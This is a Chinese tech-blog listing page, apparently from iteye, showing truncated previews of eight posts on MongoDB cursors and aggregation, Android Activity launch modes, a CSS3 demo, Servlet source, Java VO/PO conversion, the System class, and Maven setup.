  • MongoDB查询(4)——游标和分页[八] eksliang mongodbMongoDB游标MongoDB深分页
    转载请出自出处:http://eksliang.iteye.com/blog/2177567 一、游标         数据库使用游标返回find的执行结果。客户端对游标的实现通常能够对最终结果进行有效控制,从shell中定义一个游标非常简单,就是将查询结果分配给一个变量(用var声明的变量就是局部变量),便创建了一个游标,如下所示: > var
  • Activity的四种启动模式和onNewIntent() gundumw100 android
    Android中Activity启动模式详解   在Android中每个界面都是一个Activity,切换界面操作其实是多个不同Activity之间的实例化操作。在Android中Activity的启动模式决定了Activity的启动运行方式。   Android总Activity的启动模式分为四种: Activity启动模式设置: <acti
  • 攻城狮送女友的CSS3生日蛋糕 ini htmlWebhtml5csscss3
    在线预览:http://keleyi.com/keleyi/phtml/html5/29.htm   代码如下:   <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>攻城狮送女友的CSS3生日蛋糕-柯乐义<
  • 读源码学Servlet(1)GenericServlet 源码分析 jzinfo tomcatWebservlet网络应用网络协议
    Servlet API的核心就是javax.servlet.Servlet接口,所有的Servlet 类(抽象的或者自己写的)都必须实现这个接口。在Servlet接口中定义了5个方法,其中有3个方法是由Servlet 容器在Servlet的生命周期的不同阶段来调用的特定方法。     先看javax.servlet.servlet接口源码:  package
  • JAVA进阶:VO(DTO)与PO(DAO)之间的转换 snoopy7713 javaVOHibernatepo
      PO即 Persistence Object  VO即 Value Object  VO和PO的主要区别在于:  VO是独立的Java Object。  PO是由Hibernate纳入其实体容器(Entity Map)的对象,它代表了与数据库中某条记录对应的Hibernate实体,PO的变化在事务提交时将反应到实际数据库中。  实际上,这个VO被用作Data Transfer
  • mongodb group by date 聚合查询日期 统计每天数据(信息量) qiaolevip 每天进步一点点学习永无止境mongodb纵观千象
    /* 1 */ { "_id" : ObjectId("557ac1e2153c43c320393d9d"), "msgType" : "text", "sendTime" : ISODate("2015-06-12T11:26:26.000Z")
  • java之18天 常用的类(一) Luob. MathDateSystemRuntimeRundom
    System类 import java.util.Properties; /** * System: * out:标准输出,默认是控制台 * in:标准输入,默认是键盘 * * 描述系统的一些信息 * 获取系统的属性信息:Properties getProperties(); * * * */ public class Sy
  • maven wuai maven
    1、安装maven:解压缩、添加M2_HOME、添加环境变量path 2、创建maven_home文件夹,创建项目mvn_ch01,在其下面建立src、pom.xml,在src下面简历main、test、main下面建立java文件夹 3、编写类,在java文件夹下面依照类的包逐层创建文件夹,将此类放入最后一级文件夹 4、进入mvn_ch01 4.1、mvn compile ,执行后会在
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他